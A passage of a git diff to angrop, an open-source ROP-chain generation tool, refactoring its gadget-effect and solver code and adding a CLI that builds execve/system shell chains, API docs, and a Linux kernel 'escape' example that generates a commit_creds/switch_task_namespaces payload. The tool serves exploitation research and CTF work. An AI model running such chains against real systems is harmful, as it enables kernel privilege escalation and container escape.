self.addr_constant or self.addr_controllers or self.addr_stack_controllers + + def is_symbolic_access(self): + return self.addr_controllable() or bool(self.addr_dependencies) + + def addr_controllable(self): + return bool(self.addr_controllers or self.addr_stack_controllers) + + def data_controllable(self): + return bool(self.data_controllers or self.data_stack_controllers) + + def addr_data_independent(self): + return len(set(self.addr_controllers) & set(self.data_controllers)) == 0 and \ + len(set(self.addr_stack_controllers) & set(self.data_stack_controllers)) == 0 + + def __eq__(self, other): + if type(other) != RopMemAccess: + return False + if self.addr_dependencies != other.addr_dependencies or self.data_dependencies != other.data_dependencies: + return False + if self.addr_controllers != other.addr_controllers or self.data_controllers != other.data_controllers: + return False + if self.addr_constant != other.addr_constant or self.data_constant != other.data_constant: + return False + if self.addr_size != other.addr_size or self.data_size != other.data_size: + return False + return True + +class RopRegMove: + """ + Holds information about Register moves + Attributes: + from_reg (string): register that started with the data + to_reg (string): register that the data was moved to + bits (int): number of bits that were moved + """ + def __init__(self, from_reg, to_reg, bits): + self.from_reg = from_reg + self.to_reg = to_reg + self.bits = bits + + def __hash__(self): + return hash((self.from_reg, self.to_reg, self.bits)) + + def __eq__(self, other): + if type(other) != RopRegMove: + return False + return self.from_reg == other.from_reg and self.to_reg == other.to_reg and self.bits == other.bits + + def __lt__(self, other): + if type(other) != RopRegMove: + return False + t1 = (self.from_reg, self.to_reg, self.bits) + t2 = (other.from_reg, other.to_reg, other.bits) + return t1 < t2 + + def __repr__(self): + return f"RegMove: {self.to_reg} <= {self.from_reg} ({self.bits} bits)" + +class RopRegPop: + """ + a class to represent register pop effect + """ + def __init__(self, reg, bits): + assert type(reg) is str + self.reg = reg + self.bits = bits + + def __hash__(self): + return hash((self.reg, self.bits)) + + def __eq__(self, other): + if type(other) != RopRegPop: + return False + return self.reg == other.reg and self.bits == other.bits + + def __repr__(self): + return f"" + +class RopEffect: + """ + the overall effect of a gadget/rop_block + """ + def __init__(self): + + self.stack_change: int = None # type: ignore + + # register effect information + self.changed_regs = set() + # Stores the stack variables that each register depends on. + # Used to check for cases where two registers are popped from the same location. + self.concrete_regs = {} + self.reg_dependencies = {} # like rax might depend on rbx, rcx + self.reg_controllers = {} # like rax might be able to be controlled by rbx (for any value of rcx) + self.reg_pops = set() + self.reg_moves = [] + + # memory effect information + self.mem_reads = [] + self.mem_writes = [] + self.mem_changes = [] + + # List of basic block addresses for gadgets with conditional branches + self.bbl_addrs = [] + # Instruction count to estimate complexity + self.isn_count: int = None # type: ignore + + self.pop_equal_set = set() # like pop rax; mov rbx, rax; they must be the same + + # Registers that affect path constraints + self.branch_dependencies = set() + self.has_conditional_branch: bool = None # type: ignore + + @property + def oop(self): + """ + whether the gadget contains out of patch access + """ + return any(m.out_of_patch for m in self.mem_reads + self.mem_writes + self.mem_changes) + + def has_symbolic_access(self): + return self.num_sym_mem_access > 0 + + @property + def max_stack_offset(self): + project = getattr(self, "project", None) + if project is None: + project = getattr(self, "_p", None) + res = self.stack_change - project.arch.bytes # type: ignore + for m in self.mem_reads + self.mem_writes + self.mem_changes: + if m.out_of_patch and m.stack_offset > res: + res = m.stack_offset + return res + + @property + def num_sym_mem_access(self): + """ + by definition, jmp_mem gadgets have one symbolic memory access, which is its PC + we take into account that + """ + # pylint: disable=no-member + accesses = self.mem_reads + self.mem_writes + self.mem_changes + res = len([x for x in accesses if x.is_symbolic_access()]) + if hasattr(self, "transit_type") and self.transit_type == 'jmp_mem' and self.pc_target.symbolic: # type: ignore + assert res > 0 + res -= 1 + return res + + @property + def popped_regs(self): + return {x.reg for x in self.reg_pops} + + def get_pop(self, reg): + for x in self.reg_pops: + if x.reg == reg: + return x + return None + + def clear_effect(self): + RopEffect.__init__(self) + + def import_effect(self, gadget): + gadget.copy_effect(self) + + def copy_effect(self, cp): + cp.stack_change = self.stack_change + cp.changed_regs = set(self.changed_regs) + cp.reg_pops = set(self.reg_pops) + cp.concrete_regs = dict(self.concrete_regs) + cp.reg_dependencies = dict(self.reg_dependencies) + cp.reg_controllers = dict(self.reg_controllers) + cp.reg_moves = list(self.reg_moves) + cp.mem_reads = list(self.mem_reads) + cp.mem_writes = list(self.mem_writes) + cp.mem_changes = list(self.mem_changes) + cp.bbl_addrs = list(self.bbl_addrs) + cp.isn_count = self.isn_count + return cp diff --git a/angrop/rop_gadget.py b/angrop/rop_gadget.py index 1c096d00..039ab5ac 100644 --- a/angrop/rop_gadget.py +++ b/angrop/rop_gadget.py @@ -1,122 +1,15 @@ from angr import Project from .rop_utils import addr_to_asmstring +from .rop_effect import RopEffect -class RopMemAccess: - """Holds information about memory accesses - Attributes: - addr_dependencies (set): All the registers that affect the memory address. - addr_controller (set): All the registers that can determine the symbolic memory access address by itself - addr_offset (int): Constant offset in the memory address relative to register(s) - addr_stack_controller (set): all the controlled gadgets on the stack that can determine the address by itself - data_dependencies (set): All the registers that affect the data written. - data_controller (set): All the registers that can determine the symbolic data by itself - addr_constant (int): If the address is a constant it is stored here. - data_constant (int): If the data is constant it is stored here. - addr_size (int): Number of bits used for the address. - data_size (int): Number of bits used for data - """ - def __init__(self): - self.addr_dependencies = set() - self.addr_controllers = set() - self.addr_offset: int | None = None - self.addr_stack_controllers = set() - self.data_dependencies = set() - self.data_controllers = set() - self.data_stack_controllers = set() - self.addr_constant = None - self.data_constant = None - self.addr_size = None - self.data_size = None - self.op = None - - def is_valid(self): - """ - the memory access address must be one of - 1. constant - 2. controlled by registers - 3. controlled by controlled stack - """ - return self.addr_constant or self.addr_controllers or self.addr_stack_controllers - - def is_symbolic_access(self): - return self.addr_controllable() or bool(self.addr_dependencies) - - def addr_controllable(self): - return bool(self.addr_controllers or self.addr_stack_controllers) - - def data_controllable(self): - return bool(self.data_controllers or self.data_stack_controllers) - - def addr_data_independent(self): - return len(set(self.addr_controllers) & set(self.data_controllers)) == 0 and \ - len(set(self.addr_stack_controllers) & set(self.data_stack_controllers)) == 0 - - def __hash__(self): - to_hash = sorted(self.addr_dependencies) + sorted(self.data_dependencies) + [self.addr_constant] + \ - [self.data_constant] + [self.addr_size] + [self.data_size] - return hash(tuple(to_hash)) - - def __eq__(self, other): - if type(other) != RopMemAccess: - return False - if self.addr_dependencies != other.addr_dependencies or self.data_dependencies != other.data_dependencies: - return False - if self.addr_controllers != other.addr_controllers or self.data_controllers != other.data_controllers: - return False - if self.addr_constant != other.addr_constant or self.data_constant != other.data_constant: - return False - if self.addr_size != other.addr_size or self.data_size != other.data_size: - return False - return True - -class RopRegMove: - """ - Holds information about Register moves - Attributes: - from_reg (string): register that started with the data - to_reg (string): register that the data was moved to - bits (int): number of bits that were moved - """ - def __init__(self, from_reg, to_reg, bits): - self.from_reg = from_reg - self.to_reg = to_reg - self.bits = bits - - def __hash__(self): - return hash((self.from_reg, self.to_reg, self.bits)) - - def __eq__(self, other): - if type(other) != RopRegMove: - return False - return self.from_reg == other.from_reg and self.to_reg == other.to_reg and self.bits == other.bits - - def __repr__(self): - return f"RegMove: {self.to_reg} <= {self.from_reg} ({self.bits} bits)" - -class RopGadget: +class RopGadget(RopEffect): """ Gadget objects """ def __init__(self, addr): + super().__init__() self.project: Project = None # type: ignore self.addr = addr - self.stack_change: int = None # type: ignore - - # register effect information - self.changed_regs = set() - self.popped_regs = set() - # Stores the stack variables that each register depends on. - # Used to check for cases where two registers are popped from the same location. - self.popped_reg_vars = {} - self.concrete_regs = {} - self.reg_dependencies = {} # like rax might depend on rbx, rcx - self.reg_controllers = {} # like rax might be able to be controlled by rbx (for any value of rcx) - self.reg_moves = [] - - # memory effect information - self.mem_reads = [] - self.mem_writes = [] - self.mem_changes = [] # gadget transition # we now support the following gadget transitions @@ -124,18 +17,12 @@ def __init__(self, addr): # 2. jmp_reg: jmp reg <- requires reg setting before using it (call falls here as well) # 3. jmp_mem: jmp [reg+X] <- requires mem setting before using it (call falls here as well) self.transit_type: str = None # type: ignore - - self.pc_offset = None # for pop_pc, ret is basically pc_offset == stack_change - arch.bytes - self.pc_reg = None # for jmp_reg, which register it jumps to - self.pc_target = None # for jmp_mem, where it jumps to - - # List of basic block addresses for gadgets with conditional branches - self.bbl_addrs = [] - # Registers that affect path constraints - self.constraint_regs = set() - # Instruction count to estimate complexity - self.isn_count: int = None # type: ignore - self.has_conditional_branch: bool = None # type: ignore + # for pop_pc, ret is basically pc_offset == stack_change - arch.bytes + self.pc_offset: int = None # type: ignore + # for jmp_reg, which register it jumps to + self.pc_reg: str = None # type: ignore + # for jmp_mem, where it jumps to + self.pc_target: int = None # type: ignore @property def self_contained(self): @@ -144,18 +31,9 @@ def self_contained(self): e.g. 'jmp_reg' gadgets requires another one setting the registers (a gadget like mov rax, [rsp]; add rsp, 8; jmp rax will be considered pop_pc) """ - return (not self.has_conditional_branch) and self.transit_type == 'pop_pc' - - @property - def num_sym_mem_access(self): - accesses = set(self.mem_reads + self.mem_writes + self.mem_changes) - return len([x for x in accesses if x.is_symbolic_access()]) - - def has_symbolic_access(self): - accesses = set(self.mem_reads + self.mem_writes + self.mem_changes) - return any(x.is_symbolic_access() for x in accesses) + return (not self.has_conditional_branch) and self.transit_type == 'pop_pc' and not self.oop - def dstr(self): + def dstr(self) -> str: return "; ".join(addr_to_asmstring(self.project, addr) for addr in self.bbl_addrs) def pp(self): @@ -165,7 +43,7 @@ def __str__(self): s = "Gadget %#x\n" % self.addr s += "Stack change: %#x\n" % self.stack_change s += "Changed registers: " + str(self.changed_regs) + "\n" - s += "Popped registers: " + str(self.popped_regs) + "\n" + s += "Popped registers: " + str(self.reg_pops) + "\n" for move in self.reg_moves: s += "Register move: [%s to %s, %d bits]\n" % (move.from_reg, move.to_reg, move.bits) s += "Register dependencies:\n" @@ -214,39 +92,39 @@ def __str__(self): s += str(list(mem_access.data_dependencies)) + "\n" return s - def __repr__(self): + def __repr__(self) -> str: return "" % self.addr def copy(self): out = self.__class__(self.addr) + self.copy_effect(out) out.project = self.project out.addr = self.addr - out.changed_regs = set(self.changed_regs) - out.popped_regs = set(self.popped_regs) - out.popped_reg_vars = dict(self.popped_reg_vars) - out.concrete_regs = dict(self.concrete_regs) - out.reg_dependencies = dict(self.reg_dependencies) - out.reg_controllers = dict(self.reg_controllers) - out.stack_change = self.stack_change - out.mem_reads = list(self.mem_reads) - out.mem_changes = list(self.mem_changes) - out.mem_writes = list(self.mem_writes) - out.reg_moves = list(self.reg_moves) out.transit_type = self.transit_type + out.pc_offset = self.pc_offset out.pc_reg = self.pc_reg + out.pc_target = self.pc_target + out.branch_dependencies = set(self.branch_dependencies) + out.has_conditional_branch = self.has_conditional_branch return out + def __getstate__(self): + state = self.__dict__.copy() + state['project'] = None + return state + + def __setstate__(self, state): + self.__dict__.update(state) class PivotGadget(RopGadget): """ stack pivot gadget, the definition of a PivotGadget is that it can arbitrarily control the stack pointer register, and do the pivot exactly once - TODO: so currently, it cannot directly construct a `pop rbp; leave ret;` - chain to pivot stack """ def __init__(self, addr): super().__init__(addr) - self.stack_change_after_pivot = None + self.stack_change_before_pivot: int = None # type: ignore + self.stack_change_after_pivot: int = None # type: ignore # TODO: sp_controllers can be registers, payload on stack, and symbolic read data # but we do not handle symbolic read data, yet self.sp_reg_controllers = set() diff --git a/angrop/rop_utils.py b/angrop/rop_utils.py index 4e105ace..d920c204 100644 --- a/angrop/rop_utils.py +++ b/angrop/rop_utils.py @@ -1,3 +1,4 @@ +import sys import time import signal @@ -45,24 +46,49 @@ def get_ast_controllers(state, ast, reg_deps) -> set: if not ast.symbolic: return controllers - # make sure it can't be symbolic if all the registers are constrained - constraints = [] - for reg in reg_deps: - if not state.registers.load(reg).symbolic: - continue - constraints.append(state.registers.load(reg) == test_val) - if len(state.solver.eval_upto(ast, 2, extra_constraints=constraints)) > 1: - return controllers + # make sure only variables are registers + var_names = {} + for var in ast.variables: + if not var.startswith("sreg_"): + return controllers + reg = var[5:].split("-")[0] + var_names[reg] = var + + # strip operations that dont affect control + strip_ast = ast + while True: + if strip_ast.op == "Extract": + strip_ast = strip_ast.args[2] + elif strip_ast.op == "Reverse": + strip_ast = strip_ast.args[0] + elif strip_ast.op == "__add__" and len(strip_ast.args) == 2 and not strip_ast.args[1].symbolic: + strip_ast = strip_ast.args[0] + elif strip_ast.op in ('ZeroExt', 'SignExt'): + strip_ast = strip_ast.args[1] + else: + break + + # fast path just a BVS of a register + if len(strip_ast.variables) == 1 and strip_ast.op == "BVS": + assert len(reg_deps) == 1 + # return that one register as the controller + return set(reg_deps) for reg in reg_deps: - extra_constraints = [] + test_ast = ast for r in [a for a in reg_deps if a != reg]: # for bp and registers that might be set if not state.registers.load(r).symbolic: continue - extra_constraints.append(state.registers.load(r) == test_val) - - if unconstrained_check(state, ast, extra_constraints=extra_constraints): + reg_sym_val = state.registers.load(r) + test_ast = claripy.algorithm.replace(expr=test_ast, + old=reg_sym_val, + new=claripy.BVV(test_val, reg_sym_val.size())) + # we consider 32-bit control on 64-bit system valid + if state.project.arch.bits == 64 and test_ast.op in ('ZeroExt', 'SignExt') and test_ast.args[0] == 32: + test_ast = test_ast.args[1] + + if fast_unconstrained_check(state, test_ast): controllers.add(reg) return controllers @@ -90,14 +116,11 @@ def get_ast_const_offset(state, ast, reg_deps) -> int: return state.solver.eval(ast) -def unconstrained_check(state, ast, extra_constraints=None): - """ - Attempts to check if an ast is completely unconstrained - :param state: the state to use - :param ast: the ast to check - :return: True if the ast is probably completely unconstrained - """ +def loose_constrained_check(state, ast, extra_constraints=None): size = ast.size() + # we are fine with partial control on 64bit system + if size == 64: + size = 32 test_val_0 = 0x0 test_val_1 = (1 << size) - 1 test_val_2 = int("1010"*16, 2) % (1 << size) @@ -107,18 +130,37 @@ def unconstrained_check(state, ast, extra_constraints=None): % (1 << size) extra = extra_constraints if extra_constraints is not None else [] + cnt = 0 if not state.solver.satisfiable(extra_constraints= extra + [ast == test_val_0]): - return False + cnt += 1 if not state.solver.satisfiable(extra_constraints= extra + [ast == test_val_1]): + cnt += 1 + if cnt > 1: return False if not state.solver.satisfiable(extra_constraints= extra + [ast == test_val_2]): + cnt += 1 + if cnt > 1: return False if not state.solver.satisfiable(extra_constraints= extra + [ast == test_val_3]): + cnt += 1 + if cnt > 1: return False if not state.solver.satisfiable(extra_constraints= extra + [ast == test_val_4]): + cnt += 1 + if cnt > 1: return False return True +def unconstrained_check(state, ast): + """ + Attempts to check if an ast is completely unconstrained + :param state: the state to use + :param ast: the ast to check + :return: True if the ast is probably completely unconstrained + """ + if ast.variables.intersection(state.solver._solver.variables): + return False + return True def fast_unconstrained_check(state, ast): """ @@ -127,22 +169,69 @@ def fast_unconstrained_check(state, ast): :param ast: the ast to check :return: True if the ast is probably unconstrained """ - good_ops = {"Extract", "BVS", "__add__", "__sub__", "Reverse"} - if len(ast.variables) != 1: - return unconstrained_check(state, ast) + good_ops = {"Extract", "BVS", "__add__", "__sub__", "__xor__", "Reverse", "BVV"} + + if not ast.symbolic: + return False passes_prefilter = True + for a in ast.children_asts(): if a.op not in good_ops: passes_prefilter = False + # check for x __add__ x which is constrained + seen_vars = set() + for child in a.args: + if isinstance(child, (int, str)) or child is None: + continue + if len(child.variables & seen_vars): + passes_prefilter = False + seen_vars |= child.variables + if ast.op not in good_ops: passes_prefilter = False if passes_prefilter: return True - return unconstrained_check(state, ast) + def must_be_constrained(ast): + if ast.op == "__and__": + for arg in ast.args: + if not arg.symbolic and arg.concrete_value != (1< 0: # deduct f's run time from the saved timer - old_time_left -= int(time.time() - start_time) - signal.signal(signal.SIGALRM, old) - signal.alarm(old_time_left) + if old == handler: + if old_time_left > 0: # deduct f's run time from the saved timer + old_time_left -= int(time.time() - start_time) + signal.signal(signal.SIGALRM, old) + signal.alarm(old_time_left) return result return new_f return decorate diff --git a/angrop/rop_value.py b/angrop/rop_value.py index 432cb998..4050d74b 100644 --- a/angrop/rop_value.py +++ b/angrop/rop_value.py @@ -4,6 +4,7 @@ class RopValue: """ This class represents a value that needs to be concretized in a ROP chain Automatically handles rebase + TODO: the type situation is pretty bad here """ def __init__(self, value, project): if not isinstance(value, (int, str, claripy.ast.bv.BV)): @@ -18,7 +19,8 @@ def __init__(self, value, project): self._value = value # when rebase is needed, value here holds the offset self._project = project - self._rebase = None # rebase needs to be either specified or inferred + # rebase needs to be either specified or inferred + self._rebase: bool = None # type: ignore self._code_base = None self._project_update() @@ -34,22 +36,22 @@ def _project_update(self): def __add__(self, other): cp = self.copy() if type(other) is int: - cp._value += other + cp._value += other # type: ignore elif isinstance(other, RopValue): - cp._value += other._value + cp._value += other._value # type: ignore cp._rebase |= other._rebase else: raise ValueError(f"Can't add {other} to RopValue!") return cp def determined(self, chain): - res = chain._blank_state.solver.eval_upto(self._value, 2) + res = chain._blank_state.solver.eval_to_ast(self._value, 2) return len(res) <= 1 def rebase_ptr(self): pie = self._project.loader.main_object.pic if pie: - self._value -= self._code_base + self._value -= self._code_base # type: ignore self._rebase = True def rebase_analysis(self, chain=None): @@ -64,7 +66,7 @@ def rebase_analysis(self, chain=None): # if fully symbolic, we don't know whether it should be rebased or not if self.symbolic: if chain is None or not self.determined(chain): - self._rebase = None + self._rebase = None # type: ignore return concreted = chain._blank_state.solver.eval(self._value) else: @@ -75,23 +77,24 @@ def rebase_analysis(self, chain=None): if concreted < self._project.loader.min_addr or concreted >= self._project.loader.max_addr: self._rebase = False return + # FIXME: currently, we only rebase pointers in the main_object for obj in self._project.loader.all_elf_objects: if obj.pic and obj.min_addr <= concreted < obj.max_addr: + if obj != self._project.loader.main_object: + continue self._value -= obj.min_addr self._rebase = True - if obj != self._project.loader.main_object: - raise NotImplementedError("Currently, angrop does not support rebase library address!") return self._rebase = False return @property - def symbolic(self): - return self._value.symbolic + def symbolic(self) -> bool: + return self._value.symbolic # type: ignore @property - def ast(self): - assert self._value.symbolic + def ast(self) -> claripy.ast.bv.BV: + assert self._value.symbolic # type: ignore return self.data @property @@ -100,16 +103,16 @@ def is_register(self): @property def concreted(self): - assert not self._value.symbolic + assert not self._value.symbolic # type: ignore if self.rebase: - return (self._code_base + self._value).concrete_value - return self._value.concrete_value + return (self._code_base + self._value).concrete_value # type: ignore + return self._value.concrete_value # type: ignore @property - def data(self): + def data(self) -> claripy.ast.bv.BV: if self.rebase: - return self._code_base + self._value - return self._value + return self._code_base + self._value # type: ignore + return self._value # type: ignore @property def rebase(self): @@ -127,3 +130,11 @@ def copy(self): cp._rebase = self._rebase cp._code_base = self._code_base return cp + + def __getstate__(self): + state = self.__dict__.copy() + state['_project'] = None + return state + + def __setstate__(self, state): + self.__dict__.update(state) diff --git a/bin/angrop-cli b/bin/angrop-cli new file mode 100755 index 00000000..3baf8f07 --- /dev/null +++ b/bin/angrop-cli @@ -0,0 +1,127 @@ +#!/usr/bin/env python + +""" +developed within 30min at DEF CON 33 :P +""" + +import os +import hashlib +from multiprocessing import cpu_count + +import angr +import angrop +from pwnlib.elf import ELF + +def find_gadgets(path, rop, optimize=False): + cache_path = get_cache_path(path) + if not os.path.exists(cache_path): + gadgets = rop.find_gadgets(processes=cpu_count(), optimize=optimize) + rop.save_gadgets(cache_path) + else: + rop.load_gadgets(cache_path, optimize=optimize) + return rop._all_gadgets + +def dump_gadgets(args): + proj = angr.Project(args.path, load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1, only_check_near_rets=False) + gadgets = find_gadgets(args.path, rop) + records = [(g, g.dstr()) for g in gadgets] + records = sorted(records, key=lambda x: x[1]) + max_addr = proj.loader.main_object.max_addr + max_addr_str_len = len(hex(max_addr)) + for g, dstr in records: + addr_str = hex(g.addr).rjust(max_addr_str_len, '0') + contained = str(g.self_contained).lower() + print(addr_str + f': {contained:6s}: {dstr}') + +def get_cache_path(binary): + # hash binary contents for rop cache name + binhash = hashlib.md5(open(binary, 'rb').read()).hexdigest() + return os.path.join("/tmp", "%s-%s-rop" % (os.path.basename(binary), binhash)) + +def dump_chain(args): + e = ELF(args.path) + proj = angr.Project(args.path, load_options={'main_opts':{'base_addr': 0}}) + rop = proj.analyses.ROP(fast_mode=False, max_sym_mem_access=1, only_check_near_rets=False) + find_gadgets(args.path, rop, optimize=not args.fast) + match args.target: + case "execve": + execve_addr = None + if 'execve' in e.plt: + execve_addr = e.plt['execve'] + if execve_addr is None and 'execve' in e.symbols: + execve_addr = e.symbols['execve'] + + if execve_addr is None: + print("this binary doesn't have execve function") + chain = rop.execve() + chain.print_payload_code() + else: + sh = next(e.search(b'/bin/sh\x00'), None) + if sh is None: + sh = rop.chain_builder._reg_setter._get_ptr_to_writable(proj.arch.bytes) + chain = rop.write_to_mem(sh, b'/bin/sh\x00') + rop.func_call("execve", [sh, 0, 0], needs_return=False) + else: + chain = rop.func_call("execve", [sh, 0, 0], needs_return=False) + chain.print_payload_code() + #import IPython; IPython.embed() + case "system": + system_addr = None + if 'system' in e.plt: + system_addr = e.plt['system'] + if system_addr is None and 'system' in e.symbols: + system_addr = e.symbols['system'] + if system_addr is None: + raise RuntimeError("this binary does not have system function") + sh = next(e.search(b'sh\x00')) + chain = rop.func_call(system_addr, [sh], needs_return=False) + chain.print_payload_code() + #import IPython; IPython.embed() + case "arg1" | "arg2" | "arg3" | "arg4": + arg_cnt = int(args.target[3:]) + args = [0x41414141]*arg_cnt + chain = rop.func_call(0xdeadbeef, args, needs_return=False) + chain.print_payload_code() + #import IPython; IPython.embed() + case _: + raise NotImplementedError() + +if __name__ == '__main__': + import sys + import argparse + + + usage = '%(prog)s [] ' + parser = argparse.ArgumentParser(usage=usage) + + subparsers = parser.add_subparsers(help='sub-command help') + + # dumper + dumper_parser = subparsers.add_parser('dump', help='dump gadget module') + dumper_parser.add_argument('path', help="which binary to work on") + dumper_parser.set_defaults(module="dump") + + # chainer + chainer_parser = subparsers.add_parser('chain', help='chain building module') + chainer_parser.add_argument('path', help="which binary to work on") + chainer_parser.add_argument('-t', '--target', type=str, help="target goal", choices=["execve", "system", "arg1", "arg2", "arg3", "arg4"]) + chainer_parser.add_argument('-f', '--fast', action="store_true", help="whether to skip optimization") + chainer_parser.set_defaults(module="chain") + + # parse arguments + args = parser.parse_args() + if "module" not in args: + parser.print_help() + sys.exit() + module = args.module + + # handle each componet request + match module: + case "dump": + dump_gadgets(args) + case "chain": + dump_chain(args) + case _: + parser.print_help() + sys.exit() + diff --git a/docs/pythonapi.md b/docs/pythonapi.md new file mode 100644 index 00000000..ee43fcff --- /dev/null +++ b/docs/pythonapi.md @@ -0,0 +1,102 @@ +# Python API + +## Configuration +```python +proj = angr.Project() +rop = proj.analyses.ROP() +``` +common configs: +* `only_check_near_rets`: If true we skip blocks that are not near rets, default is true +* `max_block_size`: the maximum size of each basic block to consider, the default [varies by arch](https://github.com/angr/angrop/blob/master/angrop/arch.py#L41) +* `kernel_mode`: is the target linux kernel, default is false +* `fast_mode`: true/false, if set to None makes a decision based on the size of the binary (default is None). If True, skip gadgets with conditonal\_branches, floating point operations, jumps, and allow smaller gadget size + +## Find Gadgets +``` +# find gadgets using multiprocessing +rop.find_gadgets() + +# find gadgets using single thread, good for performance evaluation +rop.find_gadgets_single_threaded() +``` +common parameters: +* `optimize`: whether to perform graph optimization after finishing finding gadgets. It can save time when you only want to find gadgets +* `processes`: the number of processes for multiprocessing, the default is 4 +* `show_progress`: whether to show the progress bar, default is true + +## Basic Usage + +```python +# angrop includes methods to create certain common chains + +# setting registers +chain = rop.set_regs(rax=0x1337, rbx=0x56565656) + +# moving registers +chain = rop.move_regs(rax='rdx') + +# adding values to memory +chain = rop.add_to_mem(0x804f124, 0x41414141) + +# writing to memory +# writes "/bin/sh\0" to address 0x61b100 +chain = rop.write_to_mem(0x61b100, b"/bin/sh\0") + +# find stack pivoting chain, the argument can be a register or an address +chain = rop.pivot('rax') +chain = rop.pivot(0x41414140) + +# calling functions +chain = rop.func_call("read", [0, 0x804f000, 0x100]) + +# invoke syscall with arguments +chain = rop.do_syscall(0, [0, 0x41414141, 0x100], needs_return=False) + +# generate an `execve("/bin/sh", NULL, NULL)` chain +chain = rop.execve() + +# shifting stack pointer like add rsp, 0x8; ret (this gadget shifts rsp by 0x10) +chain = rop.shift(0x10) + +# generating ret-sled chains like ret*0x10, but works for ARM/MIPS as well +chain = rop.retsled(0x40) + +# bad bytes can be specified to generate chains with no bad bytes +rop.set_badbytes([0x0, 0x0a]) +chain = rop.set_regs(eax=0) + +# chains can be added together to chain operations +chain = rop.write_to_mem(0x61b100, b"/home/ctf/flag\x00") + rop.func_call("open", [0x61b100, os.O_RDONLY]) + ... + +# chains can be printed for copy pasting into exploits +>>> chain.print_payload_code() +chain = b"" +chain += p64(0x410b23) # pop rax; ret +chain += p64(0x74632f656d6f682f) +chain += p64(0x404dc0) # pop rbx; ret +chain += p64(0x61b0f8) +chain += p64(0x40ab63) # mov qword ptr [rbx + 8], rax; add rsp, 0x10; pop rbx; ret +... + +# chains can be pretty-printed for debugging +>>> chain.pp() +0x0000000000034573: pop rcx; ret + 0x61b0f8 +0x000000000004a1dd: pop rdi; mov edx, 0x89480002; ret + 0x68732f6e69622f +0x00000000000d5a94: mov qword ptr [rcx + 8], rdi; ret + +``` + +## Advanced Usage + +* register as an argument +If you want to directly use a register for an argument, you can do it like this: +~~~ +[ins] In [3]: rop.func_call("prepare_kernel_cred", (0x41414141, 0x42424242), preserve_regs={'rdi'}).pp() +0xffffffff81489752: pop rsi; ret + 0x42424242 +0xffffffff8114d660: + +~~~ +Here, since we tell it to preserve the `rdi` register, it will overrule the `0x41414141` argument and ignore it. diff --git a/examples/linux_escape_chain/payload_code.txt b/examples/linux_escape_chain/payload_code.txt new file mode 100644 index 00000000..71fa5c99 --- /dev/null +++ b/examples/linux_escape_chain/payload_code.txt @@ -0,0 +1,23 @@ +chain = b"" +chain += p64(0xffffffff8189c0de) # pop rdi; ret +chain += p64(0xffffffff8368b220) # init_cred +chain += p64(0xffffffff8114d3a0) # commit_creds +chain += p64(0xffffffff8189c0de) # pop rdi; ret +chain += p64(0x1) +chain += p64(0xffffffff8113fb50) # find_task_by_vpid +chain += p64(0xffffffff816ea64d) # pop rdi; mov esi, 0x8948ffd2; ret +chain += p64(0xffffffff83600118) +chain += p64(0xffffffff818be4b4) # pop rsi; ret +chain += p64(0xffffffff82504104) # srso_alias_safe_ret +chain += p64(0xffffffff810cd6f0) # native_set_pte +chain += p64(0xffffffff818765a0) # pop rbp; ret +chain += p64(0xffffffff836000d0) +chain += p64(0xffffffff81aca592) # push rax; pop rdi; call qword ptr [rbp + 0x48] +chain += p64(0xffffffff818be4b4) # pop rsi; ret +chain += p64(0xffffffff8368ad00) # init_nsproxy +chain += p64(0xffffffff8114b250) # switch_task_namespaces +chain += p64(0xffffffff8110a370) # __x64_sys_fork +chain += p64(0xffffffff8189c0de) # pop rdi; ret +chain += p64(0xffffffff) +chain += p64(0xffffffff81213580) # msleep +chain += p64(0xffffffff819c4490) diff --git a/examples/linux_escape_chain/pp.txt b/examples/linux_escape_chain/pp.txt new file mode 100644 index 00000000..554b5da3 --- /dev/null +++ b/examples/linux_escape_chain/pp.txt @@ -0,0 +1,23 @@ +0xffffffff8189c0de: pop rdi; ret + 0xffffffff8368b220 +0xffffffff8114d3a0: +0xffffffff8189c0de: pop rdi; ret + 0x1 +0xffffffff8113fb50: +0xffffffff816ea64d: pop rdi; mov esi, 0x8948ffd2; ret + 0xffffffff83600118 +0xffffffff818be4b4: pop rsi; ret + 0xffffffff82504104 +0xffffffff810cd6f0: mov qword ptr [rdi], rsi; xor esi, esi; xor edi, edi; jmp 0xffffffff822a7e60; ret +0xffffffff818765a0: pop rbp; ret + 0xffffffff836000d0 +0xffffffff81aca592: push rax; pop rdi; call qword ptr [rbp + 0x48] +0xffffffff818be4b4: pop rsi; ret + 0xffffffff8368ad00 +0xffffffff8114b250: +0xffffffff8110a370: <__x64_sys_fork> +0xffffffff8189c0de: pop rdi; ret + 0xffffffff +0xffffffff81213580: + + diff --git a/examples/linux_escape_chain/solve.py b/examples/linux_escape_chain/solve.py new file mode 100644 index 00000000..8d4975bc --- /dev/null +++ b/examples/linux_escape_chain/solve.py @@ -0,0 +1,48 @@ +""" +On my 16-core machine, it takes: +404s to analyze the gadgets +10s to optimize the graph +0.7s to generate the chain + +""" +import os +import time +import logging +from multiprocessing import cpu_count + +import angr +import angrop # pylint: disable=unused-import + +logging.getLogger("cle.backends.elf.elf").setLevel("ERROR") + +proj = angr.Project("./vmlinux_sym") +rop = proj.analyses.ROP(fast_mode=False, only_check_near_rets=False, max_block_size=12, kernel_mode=True) +cpu_num = cpu_count() + +start = time.time() +cache = "/tmp/linux_gadget_cache" +if os.path.exists(cache): + rop.load_gadgets(cache, optimize=False) +else: + rop.find_gadgets(processes=cpu_num, optimize=False) + rop.save_gadgets(cache) +print("gadget finding time:", time.time() - start) + +start = time.time() +rop.optimize(processes=cpu_num) +print("graph optimization time:", time.time() - start) + +init_cred = 0xffffffff8368b220 +init_nsproxy = 0xffffffff8368ad00 +start = time.time() +chain = rop.func_call("commit_creds", [init_cred]) + \ + rop.func_call("find_task_by_vpid", [1]) + \ + rop.move_regs(rdi='rax') + \ + rop.set_regs(rsi=init_nsproxy, preserve_regs={'rdi'}) + \ + rop.func_call("switch_task_namespaces", [], preserve_regs={'rdi', 'rsi'}) + \ + rop.func_call('__x64_sys_fork', []) + \ + rop.func_call('msleep', [0xffffffff]) +print("chain generation time:", time.time() - start) + +chain.pp() +chain.print_payload_code() diff --git a/gifs/execve.gif b/gifs/execve.gif new file mode 100644 index 00000000..fb260cba Binary files /dev/null and b/gifs/execve.gif differ diff --git a/gifs/find_gadget.gif b/gifs/find_gadget.gif new file mode 100644 index 00000000..ed63c788 Binary files /dev/null and b/gifs/find_gadget.gif differ diff --git a/gifs/kernel.gif 